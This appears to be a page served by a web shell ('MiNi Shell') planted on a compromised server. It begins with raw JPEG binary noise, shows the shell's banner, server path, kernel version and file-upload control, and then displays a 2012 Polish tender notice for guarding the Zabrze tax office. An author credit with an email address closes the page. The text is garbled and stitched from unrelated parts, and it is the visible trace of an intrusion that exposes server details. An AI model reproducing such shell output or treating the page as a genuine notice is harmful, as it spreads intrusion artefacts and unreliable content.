JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121109/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121109/440812-N-2012.html

<p class="kh_header"><b>Zabrze: Usługa ochrony fizycznej osób i mienia oraz obiektu Urzędu Skarbowego w Zabrzu przy ul. Bytomskiej 2 wraz z obsługą centrali telefonicznej</b><br>
<b>Numer ogłoszenia: 440812 - 2012; data zamieszczenia: 09.11.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Skarbowy w Zabrzu , ul. Bytomska 2, 41-800 Zabrze, woj. śląskie, tel. 032 2777699, faks 032 2777666.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.isnet.katowice.pl/us/zabrze.htm</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja rządowa terenowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa ochrony fizycznej osób i mienia oraz obiektu Urzędu Skarbowego w Zabrzu przy ul. Bytomskiej 2 wraz z obsługą centrali telefonicznej.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest usługa ochrony fizycznej osób i mienia oraz obiektu Urzędu Skarbowego w Zabrzu przy ul. Bytomskiej 2 wraz z obsługą centrali telefonicznej.
2. Kod według wspólnego słownika zamówień publicznych (CPV):
79710000-4		- usługi ochroniarskie
64214200-1		- usługi centrali telefonicznej
3. Usługa ochrony fizycznej osób i mienia oraz obiektu Urzędu Skarbowego w Zabrzu przy
ul. Bytomskiej 2:
W skład obiektu stanowiącego przedmiot ochrony wchodzi:
10-cio kondygnacyjny budynek o pow. 3364,16m2 wraz z
posesją o pow. 7013m2 na której usytuowany jest budynek garażu i kotłowni, parking dla pracowników tutejszego Urzędu usytuowany od strony frontowej budynku i bezpłatny parking dla stron. 
4.Obiekt musi być chroniony w sposób ciągły przez cały rok, również we wszystkie dni wolne od pracy. 
5.Ochronę Urzędu sprawować może jedynie koncesjonowany podmiot świadczący usługi
w zakresie ochrony osób i mienia, spełniający wymogi określone w ustawie z dnia 22 sierpnia 1997r. o ochronie osób i mienia (tekst jedn.: Dz. U. z 2005r. Nr 145 poz. 1221 z późn. zm.)
6.Ochrona obiektu realizowana będzie zgodnie z postanowieniami Planu Ochrony Urzędu Skarbowego oraz załącznikami do tego Planu. 
7.Zamawiający zapewni pracownikom ochrony zatrudnionym przez wykonawcę warunki organizacyjno - socjalne niezbędne do wykonania podstawowych zadań oraz możliwość korzystania z linii telefonicznej  w celach związanych z wykonywaniem zamówienia.
8.Świadczone usługi winny być wykonywane przez wykonawcę:
a) w poniedziałki
w godzinach od 700 do 1800  - przez dwóch pracowników ochrony, posiadających licencję pracownika  ochrony fizycznej I-go stopnia oraz poświadczenie bezpieczeństwa, upoważniające do dostępu do informacji niejawnych stanowiących tajemnicę służbową o klauzuli ZASTRZEŻONE;
w godzinach od 1800 do 700 - dnia następnego - przez jednego pracownika ochrony, nieposiadającego licencji;
b) od wtorku do piątku i inne dni robocze
w godzinach od 700 do 1500 - przez dwóch pracowników ochrony, posiadających licencję pracownika ochrony fizycznej I-go stopnia oraz poświadczenie bezpieczeństwa, upoważniające do dostępu do informacji niejawnych stanowiących tajemnicę służbową o klauzuli ZASTRZEŻONE;
w godzinach od 1500 do 700 - dnia następnego - przez jednego pracownika ochrony nieposiadającego licencji;
c) sobota, niedziela oraz inne dni wolne od pracy
całodobowo przez jednego pracownika ochrony nieposiadającego licencji; 
w przypadku odpracowywania dni wolnych od pracy w soboty, jak również ustalenia dodatkowego dnia roboczego w sobotę, Zamawiający wymaga, aby Wykonawca zapewnił ochronę obiektu, osób i mienia tak, jak w dni robocze, tj. od wtorku do piątku. O powyższym fakcie Zamawiający poinformuje Wykonawcę ze stosownym wyprzedzeniem.
9. Zamawiający zastrzega sobie możliwość ciągłego nadzoru nad sprawowaniem ochrony osób, mienia oraz obiektu. Wykonawca zobowiązany jest do prowadzenia Książki Służby, w której zamawiający ma prawo i obowiązek wpisania wszelkich uwag, spostrzeżeń i zaleceń co do sposobu i formy świadczonych usług będących przedmiotem zamówienia, nawet z żądaniem wymiany danego pracownika ochrony w terminie 7 dni. W książce służby odnotowane są :
każdorazowe zdanie i przejęcie służby wraz z uwagami z przebiegu służby,
godziny rozpoczęcia i zakończenia pracy przez osobę pełniącą służbę, jak również rejestrowanie wszystkich uwag oraz zdarzeń zaistniałych w trakcie służby,
a w szczególności osób przebywających na terenie obiektu poza godzinami urzędowania.
10. Wykonawca odpowiadać będzie wobec zamawiającego za wszelkie szkody wyrządzone zamawiającemu przez pracowników ochrony oraz osoby trzecie w przypadku nie dołożenia przez pracowników ochrony należytej staranności przy wykonywaniu umowy.
11.Do zadań wykonawcy lub jego pracowników należeć będzie w szczególności:
elektroniczna ochrona obiektu poprzez monitoring wizyjny,
zabezpieczenie obiektu przed przedostaniem się na jego teren osób nieupoważnionych,
w uzasadnionym przypadku i na wyraźne polecenie Zleceniodawcy lub pracownika Wykonawcy pełniącego dyżur, Wykonawca niezwłocznie wyśle na miejsce grupę interwencyjną w celu sprawdzenia zgłoszenia,
sprawdzenie stanu zabezpieczenia obiektu i pomieszczeń,
informowanie zamawiającego o brakach w zabezpieczeniu mienia i naruszenia przepisów z zakresu zabezpieczenia mienia przez pracowników zamawiającego, w tym niedoboru kluczy, braku zabezpieczenia pomieszczenia poprzez odciśnięcie plomby referentką itp.,
w przypadku naocznego stwierdzenia zagrożenia obiektu (np. usiłowanie dokonania kradzieży, włamania, napadu itp.) Wykonawca podejmie czynności ochronne,
w szczególności poprzez ujęcie sprawcy i przekazanie go w ręce Policji oraz niezwłocznie powiadomi o tym fakcie zamawiającego,
zabezpieczenie śladów i dowodów przestępstw przeciwko mieniu dokonanych na terenie obiektu oraz niezwłoczne powiadomienie zamawiającego, w uzgodnieniu
z zamawiającym, organów ścigania oraz udzielenie im wszystkich informacji w tym zakresie,
wydawania i przyjmowania kluczy według zasad ustalonych przez zamawiającego,
dokonywanie obchodów Urzędu na następujących zasadach:
w godzinach pracy Urzędu: 1 obchód zewnętrzny i 1 obchód wewnętrzny,
poza godzinami pracy Urzędu: 3 obchody zewnętrzne i 3 obchody wewnętrzne.
Podczas obchodu należy dokonać sprawdzenia zabezpieczenia pomieszczeń, sprawdzenia zamknięcia okien, wygaszenia świateł,
sprawdzenie zamknięć zewnętrznych obiektu,
wzywanie osób do opuszczenia obiektu, w przypadku stwierdzenia braku uprawnień do przebywania na terenie dozorowanym lub w przypadku stwierdzenia zakłócania porządku,
udzielanie wstępnych informacji interesantom i kierowanie ich do właściwych pomieszczeń służbowych,
obsługa szatni dla stron (bezpłatnej), usytuowanej przy pomieszczeniu ochrony (na parterze) w godzinach pracy Urzędu,
prowadzenie stałego dozoru sygnałów przesyłanych, gromadzonych i przetwarzanych
w elektronicznych urządzeniach i systemach alarmowych w obiekcie,
obsługa systemu alarmowego oraz zgłaszanie Zamawiającemu uwag
o nieprawidłowościach,
przedstawienia do aprobaty zamawiającemu wykazu pracowników ochrony wyznaczonych do pracy przy ochronie osób i mienia, wykaz będzie obejmował: imię, nazwisko, numer licencji (dla pracowników z licencją),
zapewnienie jednolitego umundurowania wszystkich pracowników ochrony pełniących służbę w obiekcie tut. Urzędu, w uzgodnieniu z zamawiającym oraz identyfikatora umożliwiającego identyfikację pracownika i podmiotu zatrudniającego,
Wykonawca będzie realizować umowę w oparciu o pracowników nie skazanych prawomocnym orzeczeniem za przestępstwa umyślne.
12. Obsługa centrali telefonicznej ma być wykonywana przez jednego pracownika wykonawcy ( niezależnie od pracowników pełniących w tym czasie ochronę fizyczną osób i mienia) przeszkolonego w zakresie obsługi centrali telefonicznej, a w szczególności consoli typu Siemens. Urządzenie centrali telefonicznej typu Siemens zainstalowane jest w pomieszczeniu ochrony - na parterze. Obsługa centrali telefonicznej odbywa się w godzinach:
poniedziałki - od 700 do 1800
od wtorku do piątku - od 700 do 1500.
Zadaniem pracownika wyznaczonego przez wykonawcę do obsługi centrali telefonicznej jest zapewnienie sprawnej obsługi centrali telefonicznej, poprzez łączenie przychodzących
i wychodzących rozmów telefonicznych ( tj. łączenie abonentów zewnętrznych z pracownikami oraz pracowników z abonentami zewnętrznymi). W przypadku nieobecności pracownika obsługującego centralę telefoniczną ( np. z powodu urlopu, odbywania szkoleń lub przebywania na zwolnieniu lekarskim), wykonawca zobowiązany jest do zapewnienia ciągłości obsługi centrali telefonicznej poprzez wyznaczenie innego pracownika.
W przypadku ustalenia przez Zamawiającego dodatkowych dni wolnych od pracy za odpracowaniem w soboty, jak również ustalenia dodatkowego dnia roboczego w sobotę, Wykonawca zapewni w tych dniach obsługę centrali telefonicznej tak, jak w dni robocze, tj. od wtorku do piątku. Zamawiający zastrzega sobie prawo zmian rozkładu godzin pracy ( np. wydłużenie lub skrócenie przy zachowaniu średnio 8 - godzinnego dnia roboczego w ciągu miesiąca). Wykaz ustalonych dni wolnych od pracy oraz zmian rozkładu godzin pracy, zamawiający prześle wykonawcy ze stosownym wyprzedzeniem.
13. Wykonawca z uwagi na specyfikę przedmiotu zamówienia nie może powierzyć wykonania całości przedmiotu zamówienia podwykonawcom. Ustala się, że wykonanie przedmiotu zamówienia w części dotyczącej obsługi centrali telefonicznej może zostać powierzone podwykonawcom. Umowę z podwykonawcą wykonawca przekazuje zamawiającemu na 3 dni przed rozpoczęciem realizacji zamówienia przez podwykonawcę wraz z dokumentami, z których wynika, że umowa z podwykonawcą została zawarta przez osoby uprawnione do reprezentacji podwykonawcy. Wykonawca jest odpowiedzialny za działania, uchybienia i zaniedbania podwykonawców i jego pracowników w takim samym stopniu, jakby to były działania, uchybienia lub zaniedbania jego własnych pracowników.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 79.00.00.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 24.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Aktualna koncesja wydana przez Ministra Spraw Wewnętrznych i Administracji na prowadzenie działalności gospodarczej w zakresie ochrony osób i mienia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Ocena spełnienia warunków udziału w postępowaniu będzie dokonana przez Zamawiającego na zasadzie spełnia nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunku dotyczącego posiadania odpowiedniej sytuacji ekonomicznej i finansowej należy przedłożyć:
informację banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawionej nie wcześniej niż 3 miesiące przed upływem terminu składania ofert, na kwotę nie mniejszą niż 200.000,00zł;
opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 500.000,00zł;
oświadczenie Wykonawcy że przez cały okres trwania umowy Wykonawca zobowiązuje się być ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności  związanej z przedmiotem zamówienia, na kwotę nie mniejszą niż 500.000,00zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz ofertowy - Załącznik Nr 1 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Dopuszcza się  możliwość zmiany istotnych postanowień zawartej umowy w następującym zakresie:
- Zamawiający  zastrzega sobie prawo do zmiany umowy w zakresie wyłączenia usługi obsługi centrali telefonicznej za uprzednim powiadomieniem Wykonawcy wraz z proporcjonalnym obniżeniem ryczałtowego wynagrodzenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.isnet.katowice.pl/us/zabrze.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Skarbowy w Zabrzu
ul. Bytomska 2
41-800 Zabrze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.11.2012 godzina 09:00, miejsce: Urząd Skarbowy w Zabrzu ul. Bytomska 2 41-800 Zabrze pok. 510..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com